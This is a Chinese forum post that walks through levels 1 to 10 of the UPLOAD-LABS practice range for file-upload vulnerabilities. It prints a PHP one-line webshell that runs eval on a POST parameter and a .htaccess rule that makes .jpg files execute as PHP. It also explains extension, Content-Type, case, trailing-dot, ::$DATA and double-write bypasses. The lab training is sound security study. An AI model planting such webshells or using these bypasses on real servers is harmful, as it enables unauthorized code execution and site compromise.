ToB企服应用市场:ToB评测及商务社交产业平台

标题: XAUT UPLOAD-LABS靶场实战 文件上传弊端 Day2 [打印本页]
作者: 天津储鑫盛钢材现货供应商    时间: 2024-8-16 17:38
标题: XAUT UPLOAD-LABS靶场实战 文件上传弊端 Day2
目录

1.情况配置
2.UPLOAD-LABS 01--10
1.upload-labs01
2.upload-labs02
3.upload-labs03
4.upload-labs04:
5.upload-labs05
6.upload-labs06
7.upload-labs07
8.upload-labs08
9.upload-labs09
10.upload-labs10

1.情况配置

使用phpstudy 2018 搭建靶场


2.UPLOAD-LABS 01--10

简朴一句话木马
  
  1. <?php
  2. phpinfo();
  3. @eval($_POST['pass']);
  4. ?>
复制代码
部分企业不允许上传木马,可用是否有phpinfo();页面查察是否木马上传成功。
  1.upload-labs01

  查察源码:为js代码前端过滤,只允许jpg/png/gif后缀文件
  

  用记事本编辑rsec.txt文件写入一句话木马,改后缀为.jpg上传
  

  burpsuite抓包后改后缀为.php
  

  上传后访问文件上传地点的位置可看到phpinfo();,表示上传成功,如图:
  

  2.upload-labs02

  查察源码,发现白名单只允许content-type固定三种类型的文件上传:
  

  bp抓包后修改Content-Type类型为:
  

  成功后访问文件位置,显示为:
  

  

  3.upload-labs03

  查察源码,可知为绕过黑名单上传:
  


     2)前置条件        上传图⽚时,假如提示不允许 php、asp 这种信息提示,可判断为⿊名单限定,上传⿊名单以        外的后缀名即可;        在 iis ⾥ asp 禁⽌上传了,可以上传 asa cer cdx 这些后缀,如在⽹站⾥允许.net 执⾏可以        上传 ashx 代 替 aspx。假如⽹站可以执⾏这些脚本,通过上传后⻔即可获取 webshell ;在不同的中间件中有特殊的情况,假如在 apache 可以开启 application/x-httpd-php 在    AddType application/x-httpd-php .php .phtml .php3    后缀名为 phtml 、php3 均被解析成 php    有的 apache 版本默认就会开启;    留意本实行必要开启⼀个参数,否则实行失败。    上传⽬标中间件可⽀持的情况的语⾔脚本即可,如.phtml、php3;             关于    AddType    命令的作⽤解释           AddType     指令 作⽤:在给定的⽂件扩展名与特定的内容类型之间建⽴映射 语法:    AddType MIME          type extension           [extension] …           AddType    指令在给定的⽂件扩展名与特定的内容类型之间建⽴映射关系。    MIME-type    指明了包罗    extension    扩展名的⽂件的媒体类型。           AddType     是与类型表相关的,描述的是扩展名与⽂件类型之间的关系。                   可以在httpd.conf⽂件中查察AddType 的设置情况;注:新版的phpstudy貌似没有这个了,实行              的话只能使⽤⽼版的了;            
                       去掉注释符生存重启                     

  4.upload-labs04:

  查察源码为漏过滤了.htaccess文件后缀,文件代码为:
  1. <FilesMatch "jpg">
  2. SetHandler application/x-httpd-php
  3. </FilesMatch>
复制代码
           上传模块,⿊名单过滤了全部的能执⾏的后缀名,假如允许上传.htaccess。htaccess ⽂件的作⽤是可以帮我们实现包罗:⽂件夹暗码保护、⽤户⾃动重定向、⾃界说错误⻚⾯、改变你的⽂           件扩展名、封禁特定 IP 地点的⽤户、只允许特定 IP 地点的⽤户、禁⽌⽬录列表,以及使⽤其           他⽂件作为 index ⽂件等⼀些功能;           在 htaccess ⾥写⼊     SetHandler application/x-httpd-php     则可以⽂件重写成 php ⽂件。           要 htaccess 的规则⽣效 则必要在 apache 开启 rewrite 重写模块,因为 apache 是多数都开           启这个模块,以是规则⼀般都⽣效;           
             直接上传.jpg文件:      

  访问可得:
  

  5.upload-labs05

  查察源码,可使用大写小绕过:
  

  bp抓包修改为.PhP后缀
  

  访问可得:
  

  6.upload-labs06

  查察源码,可知是windows空格弊端,windows自动删除文件后缀空格:
  

  加上空格:
  

  访问可得:
  

  7.upload-labs07

  查察源码,遗漏了删除文件末尾的"."
  

  文件后缀改为.php.
  

  访问可得:
  

  8.upload-labs08

  查察源码可知遗漏过滤“:DATA”
  在window的时候假如文件名+":DATA"会把:DATA之后的数据当成文件流处置惩罚,不会检测后缀名,且保持:DATA之前的文件名,他的目标就是不查抄后缀名
  比方:"phpinfo.php:DATA"Windows会自动去掉末尾的:DATA变成"phpinfo.php"
  

  查察可知:
  

  9.upload-labs09

  使用windows 情况的叠加特征原理
     在 windwos 中假如上传⽂件名    rsec9.php:.jpg    的时候,会在⽬录下⽣产空⽩的⽂件名   rsec9.php   ;        
      
       再利⽤ php 和 windows 情况的叠加属性写⼊内容;        以下符号在正则匹配时相等:        ●    双引号   "    便是 点号   .        ●    ⼤于符号   >    便是 问号   ?        ●    ⼩于符号   <    便是 星号   *        ●    ⽂件名   .<   或⽂件名   .<<<   或⽂件名   .>>>             利⽤ windows 情况的叠加特征绕过上传攻击           提交数据包中将内容写⼊⽂件名    rsec9.>>>     中,>>>类似通配符匹配到rsec9.php         
          访问可知:         
             10.upload-labs10

  查察源码可知,在上传模块,有的代码会把⿊名单的后缀名替换成空,比方 a.php 会把 php 替换成空,但 是可以使⽤双写绕过比方 asaspp,pphphp,即可绕过上传;同样是⿊名单过滤。str_ireplace 对上传的后缀名是⿊名单内的字符串转换成空;
  

  访问可知:
  


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4